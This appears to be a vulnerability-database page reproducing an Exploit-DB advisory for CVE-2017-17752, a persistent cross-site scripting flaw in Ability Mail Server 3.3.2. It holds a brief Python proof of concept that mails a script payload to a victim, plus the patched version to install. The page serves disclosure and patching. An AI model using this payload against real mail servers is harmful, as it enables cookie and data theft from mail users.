Lucene search
K

Ability Mail Server 3.3.2 - Cross-Site Scripting

🗓️ 20 Dec 2017 00:00:00Reported by Aloyce J. MakalangaType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 41 Views

Ability Mail Server 3.3.2 has Persistent Cross Site Scripting (XSS) via email body, allowing JavaScript execution on the Read Mail screen. Update to version 4.2.4 to fix

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Ability Mail Server 3.3.2 - Cross-Site Scripting Exploit
20 Dec 201700:00
zdt
CNVD
Code-Crafters Ability Mail Server Cross-Site Scripting Vulnerability
22 Dec 201700:00
cnvd
CVE
CVE-2017-17752
20 Dec 201716:00
cve
Cvelist
CVE-2017-17752
20 Dec 201716:00
cvelist
EUVD
EUVD-2017-8904
7 Oct 202500:30
euvd
exploitpack
Ability Mail Server 3.3.2 - Cross-Site Scripting
20 Dec 201700:00
exploitpack
NVD
CVE-2017-17752
20 Dec 201716:29
nvd
OSV
CVE-2017-17752
20 Dec 201716:29
osv
Packet Storm
Ability Mail Server 3.3.2 Cross Site Scripting
20 Dec 201700:00
packetstorm
Prion
Cross site scripting
20 Dec 201716:29
prion
Rows per page
# Exploit Title: Ability Mail Server 3.3.2 Persistent Cross Site Scripting (XSS)
# CVE: CVE-2017-17752
# Date: 19-12-2017
# Software Link: http://download.codecrafters.com/ams3.exe 
# Exploit Author: Aloyce J. Makalanga
# Contact: https://twitter.com/aloycemjr
# Vendor Homepage: http://www.codecrafters.com 
# Category: webapps
# Attack Type: Remote
# Impact: Data/Cookie theft 

 
1. Description


   Ability Mail Server 3.3.2 has Persistent Cross Site Scripting (XSS) via the body of an e-mail message, with JavaScript code executed on the Read Mail screen (aka the /_readmail URI). To exploit the vulnerability, the victim must open an email with malicious Javascript inserted into the body of the email.


   
2. Proof of Concept

 

#!/usr/bin/env python 
email_addr = '[email protected]'
email = 'From: %s\n' % email_addr
email += 'To: %s\n' % email_addr
email += 'Subject: XSS\n'
email += 'Content-type: text/html\n\n'
email +='<script>alert(1)</script>'
s = smtplib.SMTP('<Attacker IP address', 25)
s.login(email_addr, "password")
s.sendmail(email_addr, email_addr, email)
s.quit()

3. Solution:

   
Update to version 4.2.4
http://download.codecrafters.com/ams.exe

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Dec 2017 00:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 24.3
CVSS 36.1
EPSS0.00267
41